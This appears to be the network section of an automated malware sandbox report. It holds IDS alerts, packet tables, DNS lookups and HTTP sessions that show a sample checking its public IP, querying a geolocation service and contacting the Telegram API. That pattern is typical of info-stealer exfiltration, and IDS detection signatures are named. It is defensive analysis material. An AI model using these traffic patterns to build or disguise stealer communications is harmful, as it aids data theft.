2025-01-10T23:41:00.797657+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49710	158.101.44.242	80	TCP
2025-01-10T23:41:01.387210+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.12	49712	104.21.80.1	443	TCP
2025-01-10T23:41:02.233512+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49713	158.101.44.242	80	TCP
2025-01-10T23:41:03.454266+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49715	158.101.44.242	80	TCP
2025-01-10T23:41:04.014064+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.12	49716	104.21.80.1	443	TCP
2025-01-10T23:41:07.499147+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.12	49718	104.21.80.1	443	TCP
2025-01-10T23:41:16.266502+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49720	158.101.44.242	80	TCP
2025-01-10T23:41:19.288540+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.12	63815	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:40:58.796606064 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:40:58.801465034 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:40:58.801529884 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:40:58.801748991 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:40:58.806526899 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:40:59.453183889 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:40:59.460932016 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:40:59.465676069 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:40:59.620357990 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:40:59.672622919 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:40:59.918936968 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:40:59.918963909 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:40:59.919024944 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:40:59.934437037 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:40:59.934449911 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.402653933 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.402731895 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.408269882 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.408279896 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.408552885 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.453891039 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.457202911 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.499322891 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.577224970 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.577290058 CET	443	49711	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.577420950 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.582822084 CET	49711	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.588495016 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:00.593446970 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:00.749106884 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:00.753830910 CET	49712	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.753871918 CET	443	49712	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.753947020 CET	49712	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.754189968 CET	49712	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:00.754199982 CET	443	49712	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:00.797657013 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:01.235801935 CET	443	49712	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:01.243978024 CET	49712	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:01.244008064 CET	443	49712	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:01.387243986 CET	443	49712	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:01.387310028 CET	443	49712	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:01.387434959 CET	49712	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:01.422723055 CET	49712	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:01.600543022 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:01.605498075 CET	80	49710	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:01.605564117 CET	49710	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:01.605571032 CET	49713	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:01.610430002 CET	80	49713	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:01.610584974 CET	49713	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:01.610867023 CET	49713	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:01.615641117 CET	80	49713	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:02.183887959 CET	80	49713	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:02.185132980 CET	49714	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:02.185180902 CET	443	49714	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:02.185338974 CET	49714	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:02.185590982 CET	49714	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:02.185600996 CET	443	49714	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:02.233511925 CET	49713	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:02.645286083 CET	443	49714	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:02.647277117 CET	49714	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:02.647305965 CET	443	49714	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:02.809797049 CET	443	49714	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:02.809859037 CET	443	49714	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:02.809909105 CET	49714	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:02.810338974 CET	49714	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:02.813791990 CET	49713	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:02.814687014 CET	49715	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:02.818706989 CET	80	49713	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:02.818767071 CET	49713	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:02.819523096 CET	80	49715	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:02.819590092 CET	49715	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:02.819720984 CET	49715	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:02.824462891 CET	80	49715	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:03.403518915 CET	80	49715	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:03.406261921 CET	49716	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:03.406300068 CET	443	49716	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:03.406605959 CET	49716	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:03.406605959 CET	49716	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:03.406636000 CET	443	49716	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:03.454266071 CET	49715	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:03.861331940 CET	443	49716	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:03.864392996 CET	49716	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:03.864412069 CET	443	49716	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:04.014086008 CET	443	49716	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:04.014149904 CET	443	49716	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:04.014209032 CET	49716	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:04.050266027 CET	49716	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:04.053651094 CET	49717	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:04.058551073 CET	80	49717	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:04.058649063 CET	49717	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:04.058804035 CET	49717	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:04.063585043 CET	80	49717	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:06.840298891 CET	80	49717	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:06.841814041 CET	49718	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:06.841876984 CET	443	49718	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:06.841949940 CET	49718	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:06.842209101 CET	49718	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:06.842221975 CET	443	49718	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:06.891415119 CET	49717	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:07.315582037 CET	443	49718	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:07.360158920 CET	49718	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:07.384452105 CET	49718	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:07.384468079 CET	443	49718	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:07.499174118 CET	443	49718	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:07.499222040 CET	443	49718	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:07.499350071 CET	49718	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:07.548300028 CET	49718	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:07.598237991 CET	49717	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:07.598946095 CET	49719	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:07.603359938 CET	80	49717	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:07.603434086 CET	49717	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:07.603720903 CET	80	49719	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:07.603777885 CET	49719	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:07.607364893 CET	49719	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:07.612266064 CET	80	49719	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:11.185091019 CET	80	49719	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:11.216238022 CET	49720	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:11.224205971 CET	80	49720	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:11.224348068 CET	49720	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:11.224464893 CET	49720	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:11.232984066 CET	80	49720	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:11.235249996 CET	49719	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:14.681374073 CET	63811	53	192.168.2.12	1.1.1.1
Jan 10, 2025 23:41:14.686302900 CET	53	63811	1.1.1.1	192.168.2.12
Jan 10, 2025 23:41:14.686404943 CET	63811	53	192.168.2.12	1.1.1.1
Jan 10, 2025 23:41:14.691359997 CET	53	63811	1.1.1.1	192.168.2.12
Jan 10, 2025 23:41:14.828022003 CET	80	49720	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:14.832590103 CET	49719	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:14.832741976 CET	49720	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:14.837557077 CET	80	49720	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:14.837697029 CET	80	49719	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:14.837771893 CET	49719	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:15.174602985 CET	63811	53	192.168.2.12	1.1.1.1
Jan 10, 2025 23:41:15.179630041 CET	53	63811	1.1.1.1	192.168.2.12
Jan 10, 2025 23:41:15.179855108 CET	63811	53	192.168.2.12	1.1.1.1
Jan 10, 2025 23:41:16.213886023 CET	80	49720	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:16.215502977 CET	63812	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:16.215557098 CET	443	63812	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:16.215629101 CET	63812	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:16.215905905 CET	63812	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:16.215919018 CET	443	63812	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:16.266501904 CET	49720	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:16.675606012 CET	443	63812	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:16.686228991 CET	63812	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:16.686279058 CET	443	63812	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:16.831042051 CET	443	63812	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:16.831219912 CET	443	63812	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:16.831383944 CET	63812	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:16.831671000 CET	63812	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:16.834692955 CET	49720	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:16.835906029 CET	63813	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:16.840949059 CET	80	49720	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:16.840976000 CET	80	63813	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:16.841012001 CET	49720	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:16.841057062 CET	63813	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:16.841214895 CET	63813	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:16.846146107 CET	80	63813	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:17.748738050 CET	80	63813	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:17.751665115 CET	63814	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:17.751771927 CET	443	63814	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:17.751868010 CET	63814	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:17.752140999 CET	63814	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:17.752178907 CET	443	63814	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:17.797764063 CET	63813	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:18.219396114 CET	443	63814	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:18.221921921 CET	63814	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:18.221965075 CET	443	63814	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:18.374495029 CET	443	63814	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:18.374576092 CET	443	63814	104.21.80.1	192.168.2.12
Jan 10, 2025 23:41:18.374680042 CET	63814	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:18.375390053 CET	63814	443	192.168.2.12	104.21.80.1
Jan 10, 2025 23:41:18.407886982 CET	63813	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:18.413141966 CET	80	63813	158.101.44.242	192.168.2.12
Jan 10, 2025 23:41:18.413250923 CET	63813	80	192.168.2.12	158.101.44.242
Jan 10, 2025 23:41:18.416093111 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:18.416136026 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:18.416244984 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:18.416692019 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:18.416707039 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:19.048685074 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:19.048808098 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:19.053050995 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:19.053062916 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:19.053544044 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:19.055593014 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:19.103323936 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:19.288746119 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:19.288824081 CET	443	63815	149.154.167.220	192.168.2.12
Jan 10, 2025 23:41:19.288913012 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:19.289378881 CET	63815	443	192.168.2.12	149.154.167.220
Jan 10, 2025 23:41:24.944966078 CET	49715	80	192.168.2.12	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:40:58.779149055 CET	64622	53	192.168.2.12	1.1.1.1
Jan 10, 2025 23:40:58.786050081 CET	53	64622	1.1.1.1	192.168.2.12
Jan 10, 2025 23:40:59.911593914 CET	59430	53	192.168.2.12	1.1.1.1
Jan 10, 2025 23:40:59.918298960 CET	53	59430	1.1.1.1	192.168.2.12
Jan 10, 2025 23:41:14.680973053 CET	53	50752	1.1.1.1	192.168.2.12
Jan 10, 2025 23:41:18.408515930 CET	49415	53	192.168.2.12	1.1.1.1
Jan 10, 2025 23:41:18.415415049 CET	53	49415	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 23:40:58.779149055 CET	192.168.2.12	1.1.1.1	0x5c29	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.911593914 CET	192.168.2.12	1.1.1.1	0x1847	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:41:18.408515930 CET	192.168.2.12	1.1.1.1	0x769c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 23:40:58.786050081 CET	1.1.1.1	192.168.2.12	0x5c29	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 23:40:58.786050081 CET	1.1.1.1	192.168.2.12	0x5c29	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:58.786050081 CET	1.1.1.1	192.168.2.12	0x5c29	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:58.786050081 CET	1.1.1.1	192.168.2.12	0x5c29	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:58.786050081 CET	1.1.1.1	192.168.2.12	0x5c29	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:58.786050081 CET	1.1.1.1	192.168.2.12	0x5c29	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.918298960 CET	1.1.1.1	192.168.2.12	0x1847	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.918298960 CET	1.1.1.1	192.168.2.12	0x1847	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.918298960 CET	1.1.1.1	192.168.2.12	0x1847	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.918298960 CET	1.1.1.1	192.168.2.12	0x1847	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.918298960 CET	1.1.1.1	192.168.2.12	0x1847	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.918298960 CET	1.1.1.1	192.168.2.12	0x1847	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:40:59.918298960 CET	1.1.1.1	192.168.2.12	0x1847	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:41:18.415415049 CET	1.1.1.1	192.168.2.12	0x769c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49710	158.101.44.242	80	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:58.801748991 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:40:59.453183889 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:40:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2b7804c53225b3574156ca462c1a2c37 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:40:59.460932016 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:40:59.620357990 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:40:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a7646d774b2f48051ac108a2a09fa8fa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:41:00.588495016 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:41:00.749106884 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 60ddea93917cf2535782e0168eefff8d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49713	158.101.44.242	80	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:01.610867023 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:41:02.183887959 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 95af4f62659140b222bfe6bdd73d6ef0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49715	158.101.44.242	80	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:02.819720984 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:41:03.403518915 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 860d007c15977f726260221a3a7681e9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49717	158.101.44.242	80	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:04.058804035 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:41:06.840298891 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 435125872bfc9d0be08f53d9ec3ae9a6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49719	158.101.44.242	80	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:07.607364893 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
